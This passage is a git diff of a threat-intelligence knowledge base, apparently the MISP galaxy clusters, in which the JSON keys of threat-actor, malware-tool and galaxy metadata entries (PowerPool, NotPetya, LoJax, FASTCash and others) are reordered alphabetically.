}, { - "value": "PowerPool", "description": "Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.\n\nA security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler.\n\nMore specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user's permissions, allowing write privileges on files in C:\\Windows\\Task.\n\nThe vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.\n\nA couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.\n\nThe group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.\n\nThe researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/windows-task-scheduler-zero-day-exploited-by-malware/" ] }, - "uuid": "abd89986-b1b0-11e8-b857-efe290264006" + "uuid": "abd89986-b1b0-11e8-b857-efe290264006", + "value": "PowerPool" }, { - "value": "Bahamut", "description": "Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.", "meta": { "refs": [ @@ -5732,10 +5731,10 @@ "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ] }, - "uuid": "dc3edacc-bb24-11e8-81fb-8c16458922a7" + "uuid": "dc3edacc-bb24-11e8-81fb-8c16458922a7", + "value": "Bahamut" }, { - "value": "Iron Group", "description": "Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.", "meta": { "refs": [ @@ -5745,40 +5744,35 @@ "Iron Cyber Group" ] }, - "uuid": "6a0ea861-229a-45a6-98f5-228f69b43905" + "uuid": "6a0ea861-229a-45a6-98f5-228f69b43905", + "value": "Iron Group" }, { - "value": "Operation BugDrop", "description": "This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/operation-bugdrop" - ], + "cfr-suspected-state-sponsor": "Russian Federation", "cfr-suspected-victims": [ "Ukraine", "Austria", "Russia", "Saudi Arabia" ], - "cfr-suspected-state-sponsor": "Russian Federation", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Private sector" ], - "country": "RU" + "cfr-type-of-incident": "Espionage", + "country": "RU", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/operation-bugdrop" + ] }, - "uuid": "75ae52b2-bca3-11e8-af90-a78f33eee6c1" + "uuid": "75ae52b2-bca3-11e8-af90-a78f33eee6c1", + "value": "Operation BugDrop" }, { - "value": "Red October", "description": "This threat actor targets governments, diplomatic missions, academics, and energy and aerospace organizations for the purpose of espionage. Also known as the Rocra and believed to be the same threat actor as Cloud Atlas", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/red-october" - ], - "synonyms": [ - "the Rocra" - ], + "cfr-suspected-state-sponsor": "Russian Federation", "cfr-suspected-victims": [ "Russia", "Belgium", @@ -5796,15 +5790,19 @@ "Vietnam", "Italy" ], - "cfr-suspected-state-sponsor": "Russian Federation", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Private sector" ], - "country": "RU" + "cfr-type-of-incident": "Espionage", + "country": "RU", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/red-october" + ], + "synonyms": [ + "the Rocra" + ] }, - "uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0", "related": [ { "dest-uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126", @@ -5813,15 +5811,14 @@ ], "type": "same-as" } - ] + ], + "uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0", + "value": "Red October" }, { - "value": "Cloud Atlas", "description": "This threat actor targets governments and diplomatic organizations for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/cloud-atlas" - ], + "cfr-suspected-state-sponsor": "Russian Federation", "cfr-suspected-victims": [ "Russia", "India", @@ -5829,14 +5826,15 @@ "Czech Republic", "Belarus" ], - "cfr-suspected-state-sponsor": "Russian Federation", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government" ], - "country": "RU" + "cfr-type-of-incident": "Espionage", + "country": "RU", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/cloud-atlas" + ] }, - "uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126", "related": [ { "dest-uuid": "358b8982-bcaa-11e8-8a5b-4b618197c5b0", @@ -5845,33 +5843,34 @@ ], "type": "same-as" } - ] + ], + "uuid": "1572f618-bcb3-11e8-841b-1fd7f9cfe126", + "value": "Cloud Atlas" }, { - "value": "Unnamed Actor", "description": "This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission. ", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/unnamed-actor" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "China", "Myanmar", "Hong Kong", "Taiwan" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Civil society", "Government" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/unnamed-actor" + ] }, - "uuid": "bea5e256-bcc0-11e8-a478-bbf7e7585a1e" + "uuid": "bea5e256-bcc0-11e8-a478-bbf7e7585a1e", + "value": "Unnamed Actor" }, { - "value": "COBALT DICKENS", "description": "”A threat group associated with the Iranian government. The threat group created lookalike domains to phish targets and used credentials to steal intellectual property from specific resources, including library systems.”", "meta": { "refs": [ @@ -5882,10 +5881,10 @@ "Cobalt Dickens" ] }, - "uuid": "6c79bd1a-bfde-11e8-8c33-db4d9968671a" + "uuid": "6c79bd1a-bfde-11e8-8c33-db4d9968671a", + "value": "COBALT DICKENS" }, { - "value": "MageCart", "description": "Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.", "meta": { "refs": [ @@ -5893,22 +5892,21 @@ "https://www.bleepingcomputer.com/news/security/feedify-hacked-with-magecart-information-stealing-script/" ] }, - "uuid": "0768fd50-c547-11e8-9aa5-776183769eab" + "uuid": "0768fd50-c547-11e8-9aa5-776183769eab", + "value": "MageCart" }, { - "value": "Domestic Kitten", "description": "An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/" ] }, - "uuid": "dda1b28e-c558-11e8-8666-27cf61d1d7ee" + "uuid": "dda1b28e-c558-11e8-8666-27cf61d1d7ee", + "value": "Domestic Kitten" }, { - "value": "FASTCash", "description": "Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.", - "uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85", "related": [ { "dest-uuid": "e306fe62-c708-11e8-89f2-073e396e5403", @@ -5917,7 +5915,9 @@ ], "type": "similar" } - ] + ], + "uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85", + "value": "FASTCash" } ], "version": 69 diff --git a/clusters/tool.json b/clusters/tool.json index 57219ff..9a69d8a 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -4210,14 +4210,14 @@ "value": "KONNI" }, { - "value": "NOKKI", - "uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80", "description": "Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’. The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks. Because of code overlap found within both malware families, as well as infrastructure overlap, we believe the threat actors responsible for KONNI are very likely also responsible for NOKKI. Previous reports stated it was likely KONNI had been in use for over three years in multiple campaigns with a heavy interest in the Korean peninsula and surrounding areas. As of this writing, it is not certain if the KONNI or NOKKI operators are related to known adversary groups operating in the regions of interest, although there is evidence of a tenuous relationship with a group known as Reaper.", "meta": { "refs": [ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" ] - } + }, + "uuid": "9e4fd0d3-9736-421c-b1e1-96c1d3665c80", + "value": "NOKKI" }, { "description": "Recently, Palo Alto Networks researchers discovered an advanced Android malware we’ve named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.", @@ -5748,17 +5748,16 @@ "value": "KEYMARBLE" }, { - "value": "BISKVIT", "description": "The BISKVIT Trojan is a multi-component malware written in C#. We dubbed this malware BISKVIT based on the namespaces used in the code, which contain the word “biscuit”. Unfortunately, there is already an existing unrelated malware called BISCUIT, so BISKVIT is used instead, which is the Russian translation of biscuit.", "meta": { "refs": [ "https://www.fortinet.com/blog/threat-research/russian-army-exhibition-decoy-leads-to-new-biskvit-malware.html" ] }, - "uuid": "69ed8a69-8b33-4195-9b21-a1f4cd76acde" + "uuid": "69ed8a69-8b33-4195-9b21-a1f4cd76acde", + "value": "BISKVIT" }, { - "value": "Sirefef", "description": "This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including: -Downloading and running other files -Contacting remote hosts -Disabling security features\nMembers of the family can also change search results, which can generate money for the hackers who use Sirefef.", "meta": { "refs": [ @@ -5768,28 +5767,23 @@ "Win32/Sirefef" ] }, - "uuid": "641464a6-b690-11e8-976e-bffc9a17c6a4" + "uuid": "641464a6-b690-11e8-976e-bffc9a17c6a4", + "value": "Sirefef" }, { - "value": "MagentoCore Malware", "description": "A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.\nThe script is what industry experts call a \"payment card scraper\" or \"skimmer.\" Hackers breach sites and modify their source code to load the script along with its legitimate files.\nThe script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker's control.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/" ] }, - "uuid": "df05f528-bb57-11e8-9fd4-8320e14151f2" + "uuid": "df05f528-bb57-11e8-9fd4-8320e14151f2", + "value": "MagentoCore Malware" }, { - "value": "NotPetya", "description": "Threat actors deploy a tool, called NotPetya, with the purpose of encrypting data on victims' machines and rendering it unusable. The malware was spread through tax software that companies and individuals require for filing taxes in Ukraine. Australia, Estonia, Denmark, Lithuania, Ukraine, the United Kingdom, and the United States issued statements attributing NotPetya to Russian state-sponsored actors. In June 2018, the United States sanctioned Russian organizations believed to have assisted the Russian state-sponsored actors with the operation.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/notpetya" - ], - "synonyms": [ - "Not Petya" - ], + "cfr-suspected-state-sponsor": "Russian Federation", "cfr-suspected-victims": [ "Rosneft", "Cie de Saint-Gobain", @@ -5802,59 +5796,63 @@ "Merck", "Kyivenergo" ], - "cfr-suspected-state-sponsor": "Russian Federation", - "cfr-type-of-incident": "Data destruction", "cfr-target-category": [ "Government", "Private sector" + ], + "cfr-type-of-incident": "Data destruction", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/notpetya" + ], + "synonyms": [ + "Not Petya" ] }, - "uuid": "00c31914-bc0e-11e8-8241-3ff3b5e4671d" + "uuid": "00c31914-bc0e-11e8-8241-3ff3b5e4671d", + "value": "NotPetya" }, { - "value": "Xbash", "description": "Xbash is a malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.", "meta": { "refs": [ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ] }, - "uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3" + "uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3", + "value": "Xbash" }, { - "value": "LoJax", "description": "rootkit for the Unified Extensible Firmware Interface (UEFI). Used by APT28. The researchers named the rootkit LoJax, after the malicious samples of the LoJack anti-theft software that were discovered earlier this year.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/" ] }, - "uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb" + "uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb", + "value": "LoJax" }, { - "value": "Chainshot", "description": "The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/new-chainshot-malware-found-by-cracking-512-bit-rsa-key/" ] }, - "uuid": "a032460e-c54c-11e8-9965-43b7b6469a65" + "uuid": "a032460e-c54c-11e8-9965-43b7b6469a65", + "value": "Chainshot" }, { - "value": "CroniX", "description": "The researchers named this campaign CroniX, a moniker that derives from the malware's use of Cron to achieve persistence and Xhide to launch executables with fake process names. The cryptocurrency minted on victim's computers is Monero (XMR), the coin of choice in cryptojacking activities. To make sure that rival activity does not revive, CroniX deletes the binaries of other cryptominers present on the system. Another action CroniX takes to establish supremacy on the machine is to check the names of the processes and kill those that swallow 60% of the CPU or more.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/cronix-cryptominer-kills-rivals-to-reign-supreme/" ] }, - "uuid": "55d29d1c-c550-11e8-9904-47c1d86af7c5" + "uuid": "55d29d1c-c550-11e8-9904-47c1d86af7c5", + "value": "CroniX" }, { - "value": "FASTCash", "description": "Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.", - "uuid": "e306fe62-c708-11e8-89f2-073e396e5403", "related": [ { "dest-uuid": "e38d32a2-c708-11e8-8785-472c4cfccd85", @@ -5863,26 +5861,28 @@ ], "type": "similar" } - ] + ], + "uuid": "e306fe62-c708-11e8-89f2-073e396e5403", + "value": "FASTCash" }, { - "value": "ZEBROCY", "description": "ZEBROCY is a tool used by APT28, which has been observed since late 2015. The communications module used by ZEBROCY transmits using HTTP. The implant has key logging and file exfiltration functionality and utilises a file collection capability that identifies files with particular extensions.", "meta": { "refs": [ "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28" ] }, - "uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef" + "uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef", + "value": "ZEBROCY" }, { - "value": "CoalaBot", "meta": { "refs:": [ "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" ] }, - "uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412" + "uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412", + "value": "CoalaBot" } ], "version": 93 diff --git a/galaxies/android.json b/galaxies/android.json index 8edbee5..7a1d0af 100644 --- a/galaxies/android.json +++ b/galaxies/android.json @@ -1,9 +1,9 @@ { "description": "Android malware galaxy based on multiple open sources.", - "type": "android", - "version": 3, - "name": "Android", "icon": "android", + "name": "Android", + "namespace": "misp", + "type": "android", "uuid": "84310ba3-fa6a-44aa-b378-b9e3271c58fa", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/backdoor.json b/galaxies/backdoor.json index 6504c9c..4aa624d 100644 --- a/galaxies/backdoor.json +++ b/galaxies/backdoor.json @@ -1,9 +1,9 @@ { "description": "Malware Backdoor galaxy.", - "type": "backdoor", - "version": 1, - "name": "Backdoor", "icon": "door-open", + "name": "Backdoor", + "namespace": "misp", + "type": "backdoor", "uuid": "75436e27-cb57-4f32-bf1d-9636dd78a2bf", - "namespace": "misp" + "version": 1 } diff --git a/galaxies/banker.json b/galaxies/banker.json index 4726db9..979dcaf 100644 --- a/galaxies/banker.json +++ b/galaxies/banker.json @@ -1,9 +1,9 @@ { "description": "Banking malware galaxy.", - "type": "banker", - "version": 3, - "name": "Banker", "icon": "usd", + "name": "Banker", + "namespace": "misp", + "type": "banker", "uuid": "59f20cce-5420-4084-afd5-0884c0a83832", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/botnet.json b/galaxies/botnet.json index 0d89c6e..dad2244 100644 --- a/galaxies/botnet.json +++ b/galaxies/botnet.json @@ -1,9 +1,9 @@ { "description": "Botnet galaxy.", - "type": "botnet", - "version": 2, - "name": "Botnet", "icon": "sitemap", + "name": "Botnet", + "namespace": "misp", + "type": "botnet", "uuid": "90ccdf38-1649-11e8-b8bf-e7326d553087", - "namespace": "misp" + "version": 2 } diff --git a/galaxies/branded_vulnerability.json b/galaxies/branded_vulnerability.json index 0c287a4..195902c 100644 --- a/galaxies/branded_vulnerability.json +++ b/galaxies/branded_vulnerability.json @@ -1,9 +1,9 @@ { "description": "List of known vulnerabilities and exploits", - "type": "branded-vulnerability", - "version": 2, - "name": "Branded Vulnerability", "icon": "bug", + "name": "Branded Vulnerability", + "namespace": "misp", + "type": "branded-vulnerability", "uuid": "fda8c7c2-f45a-11e7-9713-e75dac0492df", - "namespace": "misp" + "version": 2 } diff --git a/galaxies/cert-eu-govsector.json b/galaxies/cert-eu-govsector.json index 84cf5aa..821c66f 100644 --- a/galaxies/cert-eu-govsector.json +++ b/galaxies/cert-eu-govsector.json @@ -1,9 +1,9 @@ { - "type": "cert-eu-govsector", - "name": "Cert EU GovSector", "description": "Cert EU GovSector", - "version": 2, "icon": "globe", + "name": "Cert EU GovSector", + "namespace": "misp", + "type": "cert-eu-govsector", "uuid": "68858a48-b898-11e7-91ce-bf424ef9b662", - "namespace": "misp" + "version": 2 } diff --git a/galaxies/exploit-kit.json b/galaxies/exploit-kit.json index 74b7999..87f4167 100644 --- a/galaxies/exploit-kit.json +++ b/galaxies/exploit-kit.json @@ -1,9 +1,9 @@ { - "type": "exploit-kit", - "name": "Exploit-Kit", "description": "Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits.It's not meant to be totally exhaustive but aim at covering the most seen in the past 5 years", - "version": 4, "icon": "internet-explorer", + "name": "Exploit-Kit", + "namespace": "misp", + "type": "exploit-kit", "uuid": "6ab240ec-bd79-11e6-a4a6-cec0c932ce01", - "namespace": "misp" + "version": 4 } diff --git a/galaxies/malpedia.json b/galaxies/malpedia.json index 8247085..9d99858 100644 --- a/galaxies/malpedia.json +++ b/galaxies/malpedia.json @@ -1,9 +1,9 @@ { "description": "Malware galaxy based on Malpedia archive.", - "type": "malpedia", - "version": 1, - "name": "Malpedia", "icon": "shield", + "name": "Malpedia", + "namespace": "misp", + "type": "malpedia", "uuid": "1d1c9af9-37fa-4deb-a928-f9b0abc7354a", - "namespace": "misp" + "version": 1 } diff --git a/galaxies/microsoft-activity-group.json b/galaxies/microsoft-activity-group.json index 4d87279..c41959a 100644 --- a/galaxies/microsoft-activity-group.json +++ b/galaxies/microsoft-activity-group.json @@ -1,9 +1,9 @@ { - "name": "Microsoft Activity Group actor", - "type": "microsoft-activity-group", "description": "Activity groups as described by Microsoft", - "version": 3, "icon": "user-secret", + "name": "Microsoft Activity Group actor", + "namespace": "misp", + "type": "microsoft-activity-group", "uuid": "74c869e8-0b8e-4e5f-96e6-cd992e07a505", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/mitre-attack-pattern.json b/galaxies/mitre-attack-pattern.json index 8c02ce1..052cfeb 100644 --- a/galaxies/mitre-attack-pattern.json +++ b/galaxies/mitre-attack-pattern.json @@ -1,9 +1,9 @@ { "description": "ATT&CK Tactic", - "uuid": "c4e851fa-775f-11e7-8163-b774922098cd", - "version": 5, - "type": "mitre-attack-pattern", - "name": "Attack Pattern", "icon": "map", - "namespace": "deprecated" + "name": "Attack Pattern", + "namespace": "deprecated", + "type": "mitre-attack-pattern", + "uuid": "c4e851fa-775f-11e7-8163-b774922098cd", + "version": 5 } diff --git a/galaxies/mitre-course-of-action.json b/galaxies/mitre-course-of-action.json index 6e9443b..fdd4cad 100644 --- a/galaxies/mitre-course-of-action.json +++ b/galaxies/mitre-course-of-action.json @@ -1,9 +1,9 @@ { - "version": 6, + "description": "ATT&CK Mitigation", "icon": "chain", "name": "Course of Action", - "description": "ATT&CK Mitigation", + "namespace": "deprecated", "type": "mitre-course-of-action", "uuid": "6fcb4472-6de4-11e7-b5f7-37771619e14e", - "namespace": "deprecated" + "version": 6 } diff --git a/galaxies/mitre-enterprise-attack-attack-pattern.json b/galaxies/mitre-enterprise-attack-attack-pattern.json index 29678fa..4ee4f96 100644 --- a/galaxies/mitre-enterprise-attack-attack-pattern.json +++ b/galaxies/mitre-enterprise-attack-attack-pattern.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack - Attack Pattern", - "type": "mitre-enterprise-attack-attack-pattern", "description": "ATT&CK Tactic", - "uuid": "fa7016a8-1707-11e8-82d0-1b73d76eb204", - "version": 4, "icon": "map", - "namespace": "mitre-attack" + "name": "Enterprise Attack - Attack Pattern", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-attack-pattern", + "uuid": "fa7016a8-1707-11e8-82d0-1b73d76eb204", + "version": 4 } diff --git a/galaxies/mitre-enterprise-attack-course-of-action.json b/galaxies/mitre-enterprise-attack-course-of-action.json index 05beced..158491c 100644 --- a/galaxies/mitre-enterprise-attack-course-of-action.json +++ b/galaxies/mitre-enterprise-attack-course-of-action.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack - Course of Action", - "type": "mitre-enterprise-attack-course-of-action", "description": "ATT&CK Mitigation", - "uuid": "fb5a36c0-1707-11e8-81f5-d732b22a4982", - "version": 4, "icon": "chain", - "namespace": "mitre-attack" + "name": "Enterprise Attack - Course of Action", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-course-of-action", + "uuid": "fb5a36c0-1707-11e8-81f5-d732b22a4982", + "version": 4 } diff --git a/galaxies/mitre-enterprise-attack-intrusion-set.json b/galaxies/mitre-enterprise-attack-intrusion-set.json index 893f1e4..4387d10 100644 --- a/galaxies/mitre-enterprise-attack-intrusion-set.json +++ b/galaxies/mitre-enterprise-attack-intrusion-set.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack -Intrusion Set", - "type": "mitre-enterprise-attack-intrusion-set", "description": "Name of ATT&CK Group", - "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee", - "version": 4, "icon": "user-secret", - "namespace": "mitre-attack" + "name": "Enterprise Attack -Intrusion Set", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-intrusion-set", + "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee", + "version": 4 } diff --git a/galaxies/mitre-enterprise-attack-malware.json b/galaxies/mitre-enterprise-attack-malware.json index 520b2fd..63e216f 100644 --- a/galaxies/mitre-enterprise-attack-malware.json +++ b/galaxies/mitre-enterprise-attack-malware.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack - Malware", - "type": "mitre-enterprise-attack-malware", "description": "Name of ATT&CK software", - "uuid": "fbb19af0-1707-11e8-9fd6-dbd88a04d33a", - "version": 4, "icon": "optin-monster", - "namespace": "mitre-attack" + "name": "Enterprise Attack - Malware", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-malware", + "uuid": "fbb19af0-1707-11e8-9fd6-dbd88a04d33a", + "version": 4 } diff --git a/galaxies/mitre-enterprise-attack-relationship.json b/galaxies/mitre-enterprise-attack-relationship.json index 0befd47..9353050 100644 --- a/galaxies/mitre-enterprise-attack-relationship.json +++ b/galaxies/mitre-enterprise-attack-relationship.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack - Relationship", - "type": "mitre-enterprise-attack-relationship", "description": "Mitre Relationship", - "uuid": "fc404638-1707-11e8-a5cf-b78b9b562766", - "version": 4, "icon": "link", - "namespace": "mitre-attack" + "name": "Enterprise Attack - Relationship", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-relationship", + "uuid": "fc404638-1707-11e8-a5cf-b78b9b562766", + "version": 4 } diff --git a/galaxies/mitre-enterprise-attack-tool.json b/galaxies/mitre-enterprise-attack-tool.json index d49456b..6ffbdd2 100644 --- a/galaxies/mitre-enterprise-attack-tool.json +++ b/galaxies/mitre-enterprise-attack-tool.json @@ -1,9 +1,9 @@ { - "name": "Enterprise Attack - Tool", - "type": "mitre-enterprise-attack-tool", "description": "Name of ATT&CK software", - "uuid": "fbfa0470-1707-11e8-be22-eb46b373fdd3", - "version": 4, "icon": "gavel", - "namespace": "mitre-attack" + "name": "Enterprise Attack - Tool", + "namespace": "mitre-attack", + "type": "mitre-enterprise-attack-tool", + "uuid": "fbfa0470-1707-11e8-be22-eb46b373fdd3", + "version": 4 } diff --git a/galaxies/mitre-intrusion-set.json b/galaxies/mitre-intrusion-set.json index 5ad5277..05afe99 100644 --- a/galaxies/mitre-intrusion-set.json +++ b/galaxies/mitre-intrusion-set.json @@ -1,9 +1,9 @@ { - "uuid": "1023f364-7831-11e7-8318-43b5531983ab", "description": "Name of ATT&CK Group", - "version": 7, "icon": "user-secret", - "type": "mitre-intrusion-set", "name": "Intrusion Set", - "namespace": "deprecated" + "namespace": "deprecated", + "type": "mitre-intrusion-set", + "uuid": "1023f364-7831-11e7-8318-43b5531983ab", + "version": 7 } diff --git a/galaxies/mitre-malware.json b/galaxies/mitre-malware.json index 06e0cf9..9406205 100644 --- a/galaxies/mitre-malware.json +++ b/galaxies/mitre-malware.json @@ -1,9 +1,9 @@ { - "type": "mitre-malware", - "version": 5, - "name": "Malware", - "uuid": "d752161c-78f6-11e7-a0ea-bfa79b407ce4", - "icon": "optin-monster", "description": "Name of ATT&CK software", - "namespace": "deprecated" + "icon": "optin-monster", + "name": "Malware", + "namespace": "deprecated", + "type": "mitre-malware", + "uuid": "d752161c-78f6-11e7-a0ea-bfa79b407ce4", + "version": 5 } diff --git a/galaxies/mitre-mobile-attack-attack-pattern.json b/galaxies/mitre-mobile-attack-attack-pattern.json index 8397ba0..ef838e1 100644 --- a/galaxies/mitre-mobile-attack-attack-pattern.json +++ b/galaxies/mitre-mobile-attack-attack-pattern.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Attack Pattern", - "type": "mitre-mobile-attack-attack-pattern", "description": "ATT&CK Tactic", - "uuid": "1c6d1332-1708-11e8-847c-e3c5643c41a5", - "version": 4, "icon": "map", - "namespace": "mitre-attack" + "name": "Mobile Attack - Attack Pattern", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-attack-pattern", + "uuid": "1c6d1332-1708-11e8-847c-e3c5643c41a5", + "version": 4 } diff --git a/galaxies/mitre-mobile-attack-course-of-action.json b/galaxies/mitre-mobile-attack-course-of-action.json index 4752e94..f90087e 100644 --- a/galaxies/mitre-mobile-attack-course-of-action.json +++ b/galaxies/mitre-mobile-attack-course-of-action.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Course of Action", - "type": "mitre-mobile-attack-course-of-action", "description": "ATT&CK Mitigation", - "uuid": "0282356a-1708-11e8-8f53-975633d5c03c", - "version": 4, "icon": "chain", - "namespace": "mitre-attack" + "name": "Mobile Attack - Course of Action", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-course-of-action", + "uuid": "0282356a-1708-11e8-8f53-975633d5c03c", + "version": 4 } diff --git a/galaxies/mitre-mobile-attack-intrusion-set.json b/galaxies/mitre-mobile-attack-intrusion-set.json index 07416e9..1db8781 100644 --- a/galaxies/mitre-mobile-attack-intrusion-set.json +++ b/galaxies/mitre-mobile-attack-intrusion-set.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Intrusion Set", - "type": "mitre-mobile-attack-intrusion-set", "description": "Name of ATT&CK Group", - "uuid": "0314e554-1708-11e8-b049-8f8a42b5bb62", - "version": 4, "icon": "user-secret", - "namespace": "mitre-attack" + "name": "Mobile Attack - Intrusion Set", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-intrusion-set", + "uuid": "0314e554-1708-11e8-b049-8f8a42b5bb62", + "version": 4 } diff --git a/galaxies/mitre-mobile-attack-malware.json b/galaxies/mitre-mobile-attack-malware.json index 91a0e81..c733326 100644 --- a/galaxies/mitre-mobile-attack-malware.json +++ b/galaxies/mitre-mobile-attack-malware.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Malware", - "type": "mitre-mobile-attack-malware", "description": "Name of ATT&CK software", - "uuid": "03e3853a-1708-11e8-95c1-67cf3f801a18", - "version": 4, "icon": "optin-monster", - "namespace": "mitre-attack" + "name": "Mobile Attack - Malware", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-malware", + "uuid": "03e3853a-1708-11e8-95c1-67cf3f801a18", + "version": 4 } diff 